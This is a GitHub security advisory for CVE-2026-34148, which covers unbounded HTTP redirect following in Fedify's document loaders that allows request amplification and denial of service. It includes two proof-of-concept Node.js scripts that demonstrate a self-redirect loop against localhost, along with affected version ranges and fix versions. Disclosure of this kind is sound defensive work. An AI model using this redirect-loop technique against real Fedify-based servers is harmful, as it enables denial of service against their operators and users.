GHSA-GM9M-GWC4-HWGP

Vulnerability from github – Published: 2026-04-07 18:04 – Updated: 2026-06-09 11:00
VLAI
Summary
Fedify affected by resource exhaustion caused by unbounded redirect following during remote key/document resolution
Details

Summary

@fedify/fedify follows HTTP redirects recursively in its remote document loader and authenticated document loader without enforcing a maximum redirect count or visited-URL loop detection. An attacker who controls a remote ActivityPub key or actor URL can force a server using Fedify to make repeated outbound requests from a single inbound request, leading to resource consumption and denial of service.

Details

Fedify verifies ActivityPub HTTP signatures by fetching the remote keyId during request processing. The relevant flow is handleInboxInternal() -> verifyRequest() -> fetchKeyInternal() -> document loader.

In affected versions: - the generic document loader recursively follows 3xx responses by calling load() again on the Location header - the authenticated redirect path (doubleKnock()) also recursively follows redirects - neither path enforces a redirect cap or tracks visited URLs to detect self-referential redirect loops

As a result, if an attacker-controlled keyId or actor URL responds with 302 Location: <same URL>, a single ActivityPub request can trigger tens or hundreds of outbound requests before the fetch completes or the request times out.

I confirmed the issue in @fedify/fedify 1.9.1 and 1.9.2. By contrast, Fedify's WebFinger lookup path already has a redirect cap, which suggests the missing bound in the document loader is unintended.

Failed key fetches are not durably negatively cached. After a failed lookup, the null result is only remembered in a request-local cache, so later requests can trigger the same redirect loop again for the same keyId.

PoC

Minimal direct reproduction with the package:

  1. Install @fedify/fedify@1.9.2.
  2. Save and run the following script:
import http from "node:http";
import { getDocumentLoader } from "@fedify/fedify";

const port = 45679;
let count = 0;
const redirectCount = 120;

const server = http.createServer((req, res) => {
  count += 1;

  if (count < redirectCount) {
    res.writeHead(302, {
      Location: `http://127.0.0.1:${port}/actor`,
    });
    res.end();
    return;
  }

  res.writeHead(200, { "Content-Type": "application/activity+json" });
  res.end(JSON.stringify({
    "@context": "https://www.w3.org/ns/activitystreams",
    "id": `http://127.0.0.1:${port}/actor`,
    "type": "Person"
  }));
});

await new Promise((resolve) => server.listen(port, "127.0.0.1", resolve));

try {
  const loader = getDocumentLoader({ allowPrivateAddress: true });
  await loader(`http://127.0.0.1:${port}/actor`);
  console.log({ count });
} finally {
  server.close();
}
  1. Observe output similar to:
{ count: 120 }

This shows the loader followed 119 self-redirects before the first non-redirect response.

The authenticated loader used for signed requests shows the same behavior:

import http from "node:http";
import {
  generateCryptoKeyPair,
  getAuthenticatedDocumentLoader,
} from "@fedify/fedify";

const port = 45680;
let count = 0;
const redirectCount = 120;

const server = http.createServer((req, res) => {
  count += 1;

  if (count < redirectCount) {
    res.writeHead(302, {
      Location: `http://127.0.0.1:${port}/actor`,
    });
    res.end();
    return;
  }

  res.writeHead(200, { "Content-Type": "application/activity+json" });
  res.end(JSON.stringify({
    "@context": "https://www.w3.org/ns/activitystreams",
    "id": `http://127.0.0.1:${port}/actor`,
    "type": "Person"
  }));
});

await new Promise((resolve) => server.listen(port, "127.0.0.1", resolve));

try {
  const { privateKey } = await generateCryptoKeyPair();
  const loader = getAuthenticatedDocumentLoader(
    {
      privateKey,
      keyId: new URL("https://example.com/users/index#main-key"),
    },
    { allowPrivateAddress: true },
  );

  await loader(`http://127.0.0.1:${port}/actor`);
  console.log({ count });
} finally {
  server.close();
}

Impact

This is an unauthenticated denial-of-service / request amplification issue. Any Fedify-based server that verifies remote keys or loads remote ActivityPub documents can be forced to spend CPU time, worker time, connection slots, and outbound bandwidth following attacker-controlled redirects. A single inbound request can trigger a large number of outbound requests, and the attack can be repeated across requests because failed lookups are not durably negatively cached.

Misc Notes

This issue was surfaced by a Ghost ActivityPub user reporting the issue directly to Ghost. The above report was generated upon further investigation into the issue by the Ghost team. We credit @wrathsec for the discovery.

Severity
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@fedify/fedify"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.9.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@fedify/vocab-runtime"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@fedify/vocab-runtime"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.1.0"
            },
            {
              "fixed": "2.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "2.1.0"
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@fedify/fedify"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.10.0"
            },
            {
              "fixed": "1.10.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@fedify/fedify"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.0.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@fedify/fedify"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.1.0"
            },
            {
              "fixed": "2.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "2.1.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34148"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-07T18:04:09Z",
    "nvd_published_at": "2026-04-06T16:16:34Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`@fedify/fedify` follows HTTP redirects recursively in its remote document loader and authenticated document loader without enforcing a maximum redirect count or visited-URL loop detection. An attacker who controls a remote ActivityPub key or actor URL can force a server using Fedify to make repeated outbound requests from a single inbound request, leading to resource consumption and denial of service.\n\n### Details\n\nFedify verifies ActivityPub HTTP signatures by fetching the remote `keyId` during request processing. The relevant flow is `handleInboxInternal()` -\u003e `verifyRequest()` -\u003e `fetchKeyInternal()` -\u003e document loader.\n\nIn affected versions:\n- the generic document loader recursively follows `3xx` responses by calling `load()` again on the `Location` header\n- the authenticated redirect path (`doubleKnock()`) also recursively follows redirects\n- neither path enforces a redirect cap or tracks visited URLs to detect self-referential redirect loops\n\nAs a result, if an attacker-controlled `keyId` or actor URL responds with `302 Location: \u003csame URL\u003e`, a single ActivityPub request can trigger tens or hundreds of outbound requests before the fetch completes or the request times out.\n\nI confirmed the issue in `@fedify/fedify` 1.9.1 and 1.9.2. By contrast, Fedify\u0027s WebFinger lookup path already has a redirect cap, which suggests the missing bound in the document loader is unintended.\n\nFailed key fetches are not durably negatively cached. After a failed lookup, the null result is only remembered in a request-local cache, so later requests can trigger the same redirect loop again for the same `keyId`.\n\n### PoC\n\nMinimal direct reproduction with the package:\n\n1. Install `@fedify/fedify@1.9.2`.\n2. Save and run the following script:\n\n```js\nimport http from \"node:http\";\nimport { getDocumentLoader } from \"@fedify/fedify\";\n\nconst port = 45679;\nlet count = 0;\nconst redirectCount = 120;\n\nconst server = http.createServer((req, res) =\u003e {\n  count += 1;\n\n  if (count \u003c redirectCount) {\n    res.writeHead(302, {\n      Location: `http://127.0.0.1:${port}/actor`,\n    });\n    res.end();\n    return;\n  }\n\n  res.writeHead(200, { \"Content-Type\": \"application/activity+json\" });\n  res.end(JSON.stringify({\n    \"@context\": \"https://www.w3.org/ns/activitystreams\",\n    \"id\": `http://127.0.0.1:${port}/actor`,\n    \"type\": \"Person\"\n  }));\n});\n\nawait new Promise((resolve) =\u003e server.listen(port, \"127.0.0.1\", resolve));\n\ntry {\n  const loader = getDocumentLoader({ allowPrivateAddress: true });\n  await loader(`http://127.0.0.1:${port}/actor`);\n  console.log({ count });\n} finally {\n  server.close();\n}\n```\n\n3. Observe output similar to:\n\n```\n{ count: 120 }\n```\n\nThis shows the loader followed 119 self-redirects before the first non-redirect response.\n\nThe authenticated loader used for signed requests shows the same behavior:\n\n```\nimport http from \"node:http\";\nimport {\n  generateCryptoKeyPair,\n  getAuthenticatedDocumentLoader,\n} from \"@fedify/fedify\";\n\nconst port = 45680;\nlet count = 0;\nconst redirectCount = 120;\n\nconst server = http.createServer((req, res) =\u003e {\n  count += 1;\n\n  if (count \u003c redirectCount) {\n    res.writeHead(302, {\n      Location: `http://127.0.0.1:${port}/actor`,\n    });\n    res.end();\n    return;\n  }\n\n  res.writeHead(200, { \"Content-Type\": \"application/activity+json\" });\n  res.end(JSON.stringify({\n    \"@context\": \"https://www.w3.org/ns/activitystreams\",\n    \"id\": `http://127.0.0.1:${port}/actor`,\n    \"type\": \"Person\"\n  }));\n});\n\nawait new Promise((resolve) =\u003e server.listen(port, \"127.0.0.1\", resolve));\n\ntry {\n  const { privateKey } = await generateCryptoKeyPair();\n  const loader = getAuthenticatedDocumentLoader(\n    {\n      privateKey,\n      keyId: new URL(\"https://example.com/users/index#main-key\"),\n    },\n    { allowPrivateAddress: true },\n  );\n\n  await loader(`http://127.0.0.1:${port}/actor`);\n  console.log({ count });\n} finally {\n  server.close();\n}\n```\n\n### Impact\n\nThis is an unauthenticated denial-of-service / request amplification issue. Any Fedify-based server that verifies remote keys or loads remote ActivityPub documents can be forced to spend CPU time, worker time, connection slots, and outbound bandwidth following attacker-controlled redirects. A single inbound request can trigger a large number of outbound requests, and the attack can be repeated across requests because failed lookups are not durably negatively cached.\n\n### Misc Notes\n\nThis issue was surfaced by a Ghost ActivityPub user reporting the issue directly to Ghost. The above report was generated upon further investigation into the issue by the Ghost team. We credit @wrathsec for the discovery.",
  "id": "GHSA-gm9m-gwc4-hwgp",
  "modified": "2026-06-09T11:00:52Z",
  "published": "2026-04-07T18:04:09Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/fedify-dev/fedify/security/advisories/GHSA-gm9m-gwc4-hwgp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34148"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fedify-dev/fedify"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fedify-dev/fedify/releases/tag/1.10.5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fedify-dev/fedify/releases/tag/1.9.6"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fedify-dev/fedify/releases/tag/2.0.8"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fedify-dev/fedify/releases/tag/2.1.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Fedify affected by resource exhaustion caused by unbounded redirect following during remote key/document resolution"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.